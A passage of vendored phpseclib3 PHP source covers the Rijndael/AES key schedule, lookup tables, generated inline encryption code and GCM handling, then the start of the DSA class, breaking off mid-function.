0xab000000, 0x4d000000, 0x9a000000, 0x2f000000, 0x5e000000, 0xbc000000, 0x63000000, 0xc6000000, 0x97000000, 0x35000000, 0x6a000000, 0xd4000000, 0xb3000000, 0x7d000000, 0xfa000000, 0xef000000, 0xc5000000, 0x91000000]; $rcon = \array_map('intval', $rcon); } if (isset($this->kl['key']) && $this->key === $this->kl['key'] && $this->key_length === $this->kl['key_length'] && $this->block_size === $this->kl['block_size']) { // already expanded return; } $this->kl = ['key' => $this->key, 'key_length' => $this->key_length, 'block_size' => $this->block_size]; $this->Nk = $this->key_length >> 2; // see Rijndael-ammended.pdf#page=44 $this->Nr = \max($this->Nk, $this->Nb) + 6; // shift offsets for Nb = 5, 7 are defined in Rijndael-ammended.pdf#page=44, // "Table 8: Shift offsets in Shiftrow for the alternative block lengths" // shift offsets for Nb = 4, 6, 8 are defined in Rijndael-ammended.pdf#page=14, // "Table 2: Shift offsets for different block lengths" switch ($this->Nb) { case 4: case 5: case 6: $this->c = [0, 1, 2, 3]; break; case 7: $this->c = [0, 1, 2, 4]; break; case 8: $this->c = [0, 1, 3, 4]; } $w = \array_values(\unpack('N*words', $this->key)); $length = $this->Nb * ($this->Nr + 1); for ($i = $this->Nk; $i < $length; $i++) { $temp = $w[$i - 1]; if ($i % $this->Nk == 0) { // according to <http://php.net/language.types.integer>, "the size of an integer is platform-dependent". // on a 32-bit machine, it's 32-bits, and on a 64-bit machine, it's 64-bits. on a 32-bit machine, // 0xFFFFFFFF << 8 == 0xFFFFFF00, but on a 64-bit machine, it equals 0xFFFFFFFF00. as such, doing 'and' // with 0xFFFFFFFF (or 0xFFFFFF00) on a 32-bit machine is unnecessary, but on a 64-bit machine, it is. $temp = $temp << 8 & \intval(0xffffff00) | $temp >> 24 & 0xff; // rotWord $temp = $this->subWord($temp) ^ $rcon[$i / $this->Nk]; } elseif ($this->Nk > 6 && $i % $this->Nk == 4) { $temp = $this->subWord($temp); } $w[$i] = $w[$i - $this->Nk] ^ $temp; } // convert the key schedule from a vector of $Nb * ($Nr + 1) length to a matrix with $Nr + 1 rows and $Nb columns // and generate the inverse key schedule. more specifically, // according to <http://csrc.nist.gov/archive/aes/rijndael/Rijndael-ammended.pdf#page=23> (section 5.3.3), // "The key expansion for the Inverse Cipher is defined as follows: // 1. Apply the Key Expansion. // 2. Apply InvMixColumn to all Round Keys except the first and the last one." // also, see fips-197.pdf#page=27, "5.3.5 Equivalent Inverse Cipher" list($dt0, $dt1, $dt2, $dt3) = $this->getInvTables(); $temp = $this->w = $this->dw = []; for ($i = $row = $col = 0; $i < $length; $i++, $col++) { if ($col == $this->Nb) { if ($row == 0) { $this->dw[0] = $this->w[0]; } else { // subWord + invMixColumn + invSubWord = invMixColumn $j = 0; while ($j < $this->Nb) { $dw = $this->subWord($this->w[$row][$j]); $temp[$j] = $dt0[$dw >> 24 & 0xff] ^ $dt1[$dw >> 16 & 0xff] ^ $dt2[$dw >> 8 & 0xff] ^ $dt3[$dw & 0xff]; $j++; } $this->dw[$row] = $temp; } $col = 0; $row++; } $this->w[$row][$col] = $w[$i]; } $this->dw[$row] = $this->w[$row]; // Converting to 1-dim key arrays (both ascending) $this->dw = \array_reverse($this->dw); $w = \array_pop($this->w); $dw = \array_pop($this->dw); foreach ($this->w as $r => $wr) { foreach ($wr as $c => $wc) { $w[] = $wc; $dw[] = $this->dw[$r][$c]; } } $this->w = $w; $this->dw = $dw; } /** * Performs S-Box substitutions * * @return array * @param int $word */ private function subWord($word) { static $sbox; if (empty($sbox)) { list(, , , , $sbox) = self::getTables(); } return $sbox[$word & 0xff] | $sbox[$word >> 8 & 0xff] << 8 | $sbox[$word >> 16 & 0xff] << 16 | $sbox[$word >> 24 & 0xff] << 24; } /** * Provides the mixColumns and sboxes tables * * @see self::encryptBlock() * @see self::setupInlineCrypt() * @see self::subWord() * @return array &$tables */ protected function &getTables() { static $tables; if (empty($tables)) { // according to <http://csrc.nist.gov/archive/aes/rijndael/Rijndael-ammended.pdf#page=19> (section 5.2.1), // precomputed tables can be used in the mixColumns phase. in that example, they're assigned t0...t3, so // those are the names we'll use. $t3 = \array_map('intval', [ // with array_map('intval', ...) we ensure we have only int's and not // some slower floats converted by php automatically on high values 0x6363a5c6, 0x7c7c84f8, 0x777799ee, 0x7b7b8df6, 0xf2f20dff, 0x6b6bbdd6, 0x6f6fb1de, 0xc5c55491, 0x30305060, 0x1010302, 0x6767a9ce, 0x2b2b7d56, 0xfefe19e7, 0xd7d762b5, 0xababe64d, 0x76769aec, 0xcaca458f, 0x82829d1f, 0xc9c94089, 0x7d7d87fa, 0xfafa15ef, 0x5959ebb2, 0x4747c98e, 0xf0f00bfb, 0xadadec41, 0xd4d467b3, 0xa2a2fd5f, 0xafafea45, 0x9c9cbf23, 0xa4a4f753, 0x727296e4, 0xc0c05b9b, 0xb7b7c275, 0xfdfd1ce1, 0x9393ae3d, 0x26266a4c, 0x36365a6c, 0x3f3f417e, 0xf7f702f5, 0xcccc4f83, 0x34345c68, 0xa5a5f451, 0xe5e534d1, 0xf1f108f9, 0x717193e2, 0xd8d873ab, 0x31315362, 0x15153f2a, 0x4040c08, 0xc7c75295, 0x23236546, 0xc3c35e9d, 0x18182830, 0x9696a137, 0x5050f0a, 0x9a9ab52f, 0x707090e, 0x12123624, 0x80809b1b, 0xe2e23ddf, 0xebeb26cd, 0x2727694e, 0xb2b2cd7f, 0x75759fea, 0x9091b12, 0x83839e1d, 0x2c2c7458, 0x1a1a2e34, 0x1b1b2d36, 0x6e6eb2dc, 0x5a5aeeb4, 0xa0a0fb5b, 0x5252f6a4, 0x3b3b4d76, 0xd6d661b7, 0xb3b3ce7d, 0x29297b52, 0xe3e33edd, 0x2f2f715e, 0x84849713, 0x5353f5a6, 0xd1d168b9, 0x0, 0xeded2cc1, 0x20206040, 0xfcfc1fe3, 0xb1b1c879, 0x5b5bedb6, 0x6a6abed4, 0xcbcb468d, 0xbebed967, 0x39394b72, 0x4a4ade94, 0x4c4cd498, 0x5858e8b0, 0xcfcf4a85, 0xd0d06bbb, 0xefef2ac5, 0xaaaae54f, 0xfbfb16ed, 0x4343c586, 0x4d4dd79a, 0x33335566, 0x85859411, 0x4545cf8a, 0xf9f910e9, 0x2020604, 0x7f7f81fe, 0x5050f0a0, 0x3c3c4478, 0x9f9fba25, 0xa8a8e34b, 0x5151f3a2, 0xa3a3fe5d, 0x4040c080, 0x8f8f8a05, 0x9292ad3f, 0x9d9dbc21, 0x38384870, 0xf5f504f1, 0xbcbcdf63, 0xb6b6c177, 0xdada75af, 0x21216342, 0x10103020, 0xffff1ae5, 0xf3f30efd, 0xd2d26dbf, 0xcdcd4c81, 0xc0c1418, 0x13133526, 0xecec2fc3, 0x5f5fe1be, 0x9797a235, 0x4444cc88, 0x1717392e, 0xc4c45793, 0xa7a7f255, 0x7e7e82fc, 0x3d3d477a, 0x6464acc8, 0x5d5de7ba, 0x19192b32, 0x737395e6, 0x6060a0c0, 0x81819819, 0x4f4fd19e, 0xdcdc7fa3, 0x22226644, 0x2a2a7e54, 0x9090ab3b, 0x8888830b, 0x4646ca8c, 0xeeee29c7, 0xb8b8d36b, 0x14143c28, 0xdede79a7, 0x5e5ee2bc, 0xb0b1d16, 0xdbdb76ad, 0xe0e03bdb, 0x32325664, 0x3a3a4e74, 0xa0a1e14, 0x4949db92, 0x6060a0c, 0x24246c48, 0x5c5ce4b8, 0xc2c25d9f, 0xd3d36ebd, 0xacacef43, 0x6262a6c4, 0x9191a839, 0x9595a431, 0xe4e437d3, 0x79798bf2, 0xe7e732d5, 0xc8c8438b, 0x3737596e, 0x6d6db7da, 0x8d8d8c01, 0xd5d564b1, 0x4e4ed29c, 0xa9a9e049, 0x6c6cb4d8, 0x5656faac, 0xf4f407f3, 0xeaea25cf, 0x6565afca, 0x7a7a8ef4, 0xaeaee947, 0x8081810, 0xbabad56f, 0x787888f0, 0x25256f4a, 0x2e2e725c, 0x1c1c2438, 0xa6a6f157, 0xb4b4c773, 0xc6c65197, 0xe8e823cb, 0xdddd7ca1, 0x74749ce8, 0x1f1f213e, 0x4b4bdd96, 0xbdbddc61, 0x8b8b860d, 0x8a8a850f, 0x707090e0, 0x3e3e427c, 0xb5b5c471, 0x6666aacc, 0x4848d890, 0x3030506, 0xf6f601f7, 0xe0e121c, 0x6161a3c2, 0x35355f6a, 0x5757f9ae, 0xb9b9d069, 0x86869117, 0xc1c15899, 0x1d1d273a, 0x9e9eb927, 0xe1e138d9, 0xf8f813eb, 0x9898b32b, 0x11113322, 0x6969bbd2, 0xd9d970a9, 0x8e8e8907, 0x9494a733, 0x9b9bb62d, 0x1e1e223c, 0x87879215, 0xe9e920c9, 0xcece4987, 0x5555ffaa, 0x28287850, 0xdfdf7aa5, 0x8c8c8f03, 0xa1a1f859, 0x89898009, 0xd0d171a, 0xbfbfda65, 0xe6e631d7, 0x4242c684, 0x6868b8d0, 0x4141c382, 0x9999b029, 0x2d2d775a, 0xf0f111e, 0xb0b0cb7b, 0x5454fca8, 0xbbbbd66d, 0x16163a2c, ]); foreach ($t3 as $t3i) { $t0[] = $t3i << 24 & \intval(0xff000000) | $t3i >> 8 & 0xffffff; $t1[] = $t3i << 16 & \intval(0xffff0000) | $t3i >> 16 & 0xffff; $t2[] = $t3i << 8 & \intval(0xffffff00) | $t3i >> 24 & 0xff; } $tables = [ // The Precomputed mixColumns tables t0 - t3 $t0, $t1, $t2, $t3, // The SubByte S-Box [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x1, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76, 0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x4, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x5, 0x9a, 0x7, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x9, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x0, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x2, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2, 0xcd, 0xc, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0xb, 0xdb, 0xe0, 0x32, 0x3a, 0xa, 0x49, 0x6, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x8, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x3, 0xf6, 0xe, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0xd, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0xf, 0xb0, 0x54, 0xbb, 0x16], ]; } return $tables; } /** * Provides the inverse mixColumns and inverse sboxes tables * * @see self::decryptBlock() * @see self::setupInlineCrypt() * @see self::setupKey() * @return array &$tables */ protected function &getInvTables() { static $tables; if (empty($tables)) { $dt3 = \array_map('intval', [0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x24c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x82b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x36aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x7f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x5bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x6d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x0, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0xefffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0xfd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0xa67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x90d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x1269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x4984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0xb412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0xd9541ff, 0xa8017139, 0xcb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0]); foreach ($dt3 as $dt3i) { $dt0[] = $dt3i << 24 & \intval(0xff000000) | $dt3i >> 8 & 0xffffff; $dt1[] = $dt3i << 16 & \intval(0xffff0000) | $dt3i >> 16 & 0xffff; $dt2[] = $dt3i << 8 & \intval(0xffffff00) | $dt3i >> 24 & 0xff; } $tables = [ // The Precomputed inverse mixColumns tables dt0 - dt3 $dt0, $dt1, $dt2, $dt3, // The inverse SubByte S-Box [0x52, 0x9, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38, 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb, 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87, 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb, 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d, 0xee, 0x4c, 0x95, 0xb, 0x42, 0xfa, 0xc3, 0x4e, 0x8, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2, 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25, 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16, 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92, 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda, 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84, 0x90, 0xd8, 0xab, 0x0, 0x8c, 0xbc, 0xd3, 0xa, 0xf7, 0xe4, 0x58, 0x5, 0xb8, 0xb3, 0x45, 0x6, 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0xf, 0x2, 0xc1, 0xaf, 0xbd, 0x3, 0x1, 0x13, 0x8a, 0x6b, 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea, 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73, 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85, 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e, 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89, 0x6f, 0xb7, 0x62, 0xe, 0xaa, 0x18, 0xbe, 0x1b, 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20, 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4, 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x7, 0xc7, 0x31, 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f, 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0xd, 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef, 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0, 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61, 0x17, 0x2b, 0x4, 0x7e, 0xba, 0x77, 0xd6, 0x26, 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0xc, 0x7d], ]; } return $tables; } /** * Setup the performance-optimized function for de/encrypt() * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupInlineCrypt() */ protected function setupInlineCrypt() { $w = $this->w; $dw = $this->dw; $init_encrypt = ''; $init_decrypt = ''; $Nr = $this->Nr; $Nb = $this->Nb; $c = $this->c; // Generating encrypt code: $init_encrypt .= ' if (empty($tables)) { $tables = &$this->getTables(); } $t0 = $tables[0]; $t1 = $tables[1]; $t2 = $tables[2]; $t3 = $tables[3]; $sbox = $tables[4]; '; $s = 'e'; $e = 's'; $wc = $Nb - 1; // Preround: addRoundKey $encrypt_block = '$in = unpack("N*", $in);' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= '$s' . $i . ' = $in[' . ($i + 1) . '] ^ ' . $w[++$wc] . ";\n"; } // Mainrounds: shiftRows + subWord + mixColumns + addRoundKey for ($round = 1; $round < $Nr; ++$round) { list($s, $e) = [$e, $s]; for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= '$' . $e . $i . ' = $t0[($' . $s . $i . ' >> 24) & 0xff] ^ $t1[($' . $s . ($i + $c[1]) % $Nb . ' >> 16) & 0xff] ^ $t2[($' . $s . ($i + $c[2]) % $Nb . ' >> 8) & 0xff] ^ $t3[ $' . $s . ($i + $c[3]) % $Nb . ' & 0xff] ^ ' . $w[++$wc] . ";\n"; } } // Finalround: subWord + shiftRows + addRoundKey for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= '$' . $e . $i . ' = $sbox[ $' . $e . $i . ' & 0xff] | ($sbox[($' . $e . $i . ' >> 8) & 0xff] << 8) | ($sbox[($' . $e . $i . ' >> 16) & 0xff] << 16) | ($sbox[($' . $e . $i . ' >> 24) & 0xff] << 24);' . "\n"; } $encrypt_block .= '$in = pack("N*"' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $encrypt_block .= ', ($' . $e . $i . ' & ' . (int) 0xff000000 . ') ^ ($' . $e . ($i + $c[1]) % $Nb . ' & 0x00FF0000 ) ^ ($' . $e . ($i + $c[2]) % $Nb . ' & 0x0000FF00 ) ^ ($' . $e . ($i + $c[3]) % $Nb . ' & 0x000000FF ) ^ ' . $w[$i] . "\n"; } $encrypt_block .= ');'; // Generating decrypt code: $init_decrypt .= ' if (empty($invtables)) { $invtables = &$this->getInvTables(); } $dt0 = $invtables[0]; $dt1 = $invtables[1]; $dt2 = $invtables[2]; $dt3 = $invtables[3]; $isbox = $invtables[4]; '; $s = 'e'; $e = 's'; $wc = $Nb - 1; // Preround: addRoundKey $decrypt_block = '$in = unpack("N*", $in);' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= '$s' . $i . ' = $in[' . ($i + 1) . '] ^ ' . $dw[++$wc] . ';' . "\n"; } // Mainrounds: shiftRows + subWord + mixColumns + addRoundKey for ($round = 1; $round < $Nr; ++$round) { list($s, $e) = [$e, $s]; for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= '$' . $e . $i . ' = $dt0[($' . $s . $i . ' >> 24) & 0xff] ^ $dt1[($' . $s . ($Nb + $i - $c[1]) % $Nb . ' >> 16) & 0xff] ^ $dt2[($' . $s . ($Nb + $i - $c[2]) % $Nb . ' >> 8) & 0xff] ^ $dt3[ $' . $s . ($Nb + $i - $c[3]) % $Nb . ' & 0xff] ^ ' . $dw[++$wc] . ";\n"; } } // Finalround: subWord + shiftRows + addRoundKey for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= '$' . $e . $i . ' = $isbox[ $' . $e . $i . ' & 0xff] | ($isbox[($' . $e . $i . ' >> 8) & 0xff] << 8) | ($isbox[($' . $e . $i . ' >> 16) & 0xff] << 16) | ($isbox[($' . $e . $i . ' >> 24) & 0xff] << 24);' . "\n"; } $decrypt_block .= '$in = pack("N*"' . "\n"; for ($i = 0; $i < $Nb; ++$i) { $decrypt_block .= ', ($' . $e . $i . ' & ' . (int) 0xff000000 . ') ^ ($' . $e . ($Nb + $i - $c[1]) % $Nb . ' & 0x00FF0000 ) ^ ($' . $e . ($Nb + $i - $c[2]) % $Nb . ' & 0x0000FF00 ) ^ ($' . $e . ($Nb + $i - $c[3]) % $Nb . ' & 0x000000FF ) ^ ' . $dw[$i] . "\n"; } $decrypt_block .= ');'; $this->inline_crypt = $this->createInlineCryptFunction(['init_crypt' => 'static $tables; static $invtables;', 'init_encrypt' => $init_encrypt, 'init_decrypt' => $init_decrypt, 'encrypt_block' => $encrypt_block, 'decrypt_block' => $decrypt_block]); } /** * Encrypts a message. * * @see self::decrypt() * @see parent::encrypt() * @param string $plaintext * @return string */ public function encrypt($plaintext) { $this->setup(); switch ($this->engine) { case self::ENGINE_LIBSODIUM: $this->newtag = \sodium_crypto_aead_aes256gcm_encrypt($plaintext, $this->aad, $this->nonce, $this->key); return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::shift($this->newtag, \strlen($plaintext)); case self::ENGINE_OPENSSL_GCM: return \openssl_encrypt($plaintext, 'aes-' . $this->getKeyLength() . '-gcm', $this->key, \OPENSSL_RAW_DATA, $this->nonce, $this->newtag, $this->aad); } return parent::encrypt($plaintext); } /** * Decrypts a message. * * @see self::encrypt() * @see parent::decrypt() * @param string $ciphertext * @return string */ public function decrypt($ciphertext) { $this->setup(); switch ($this->engine) { case self::ENGINE_LIBSODIUM: if ($this->oldtag === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Authentication Tag has not been set'); } if (\strlen($this->oldtag) != 16) { break; } $plaintext = \sodium_crypto_aead_aes256gcm_decrypt($ciphertext . $this->oldtag, $this->aad, $this->nonce, $this->key); if ($plaintext === \false) { $this->oldtag = \false; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException('Error decrypting ciphertext with libsodium'); } return $plaintext; case self::ENGINE_OPENSSL_GCM: if ($this->oldtag === \false) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException('Authentication Tag has not been set'); } $plaintext = \openssl_decrypt($ciphertext, 'aes-' . $this->getKeyLength() . '-gcm', $this->key, \OPENSSL_RAW_DATA, $this->nonce, $this->oldtag, $this->aad); if ($plaintext === \false) { $this->oldtag = \false; throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadDecryptionException('Error decrypting ciphertext with OpenSSL'); } return $plaintext; } return parent::decrypt($ciphertext); } } <?php /** * Pure-PHP FIPS 186-4 compliant implementation of DSA. * * PHP version 5 * * Here's an example of how to create signatures and verify signatures with this library: * <code> * <?php * include 'vendor/autoload.php'; * * $private = \phpseclib3\Crypt\DSA::createKey(); * $public = $private->getPublicKey(); * * $plaintext = 'terrafrost'; * * $signature = $private->sign($plaintext); * * echo $public->verify($plaintext, $signature) ? 'verified' : 'unverified'; * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Parameters; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\PrivateKey; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\PublicKey; use Google\Site_Kit_Dependencies\phpseclib3\Exception\InsufficientSetupException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Pure-PHP FIPS 186-4 compliant implementation of DSA. * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DSA extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\AsymmetricKey { /** * Algorithm Name * * @var string */ const ALGORITHM = 'DSA'; /** * DSA Prime P * * @var BigInteger */ protected $p; /** * DSA Group Order q * * Prime divisor of p-1 * * @var BigInteger */ protected $q; /** * DSA Group Generator G * * @var BigInteger */ protected $g; /** * DSA public key value y * * @var BigInteger */ protected $y; /** * Signature Format * * @var string */ protected $sigFormat; /** * Signature Format (Short) * * @var string */ protected $shortFormat; /** * Create DSA parameters * * @param int $L * @param int $N * @return DSA|bool */ public static function createParameters($L = 2048, $N = 224) { self::initialize_static_variables(); $class = new \ReflectionClass(static::class); if ($class->isFinal()) { throw new \RuntimeException('createParameters() should not be called from final classes (' . static::class . ')'); } if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } switch (\true) { case $N == 160: /* in FIPS 186-1 and 186-2 N was fixed at 160 whereas K had an upper bound of 1024. RFC 4253 (SSH Transport Layer Protocol) references FIPS 186-2 and as such most SSH DSA implementations only support keys with an N of 160. puttygen let's you set the size of L (but not the size of N) and uses 2048 as the default L value. that's not really compliant with any of the FIPS standards, however, for the purposes of maintaining compatibility with puttygen, we'll support it */ //case ($L >= 512 || $L <= 1024) && (($L & 0x3F) == 0) && $N == 160: // FIPS 186-3 changed this as follows: //case $L == 1024 && $N == 160: case $L == 2048 && $N == 224: case $L == 2048 && $N == 256: case $L == 3072 && $N == 256: break; default: throw new \InvalidArgumentException('Invalid values for N and L'); } $two = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(2); $q = 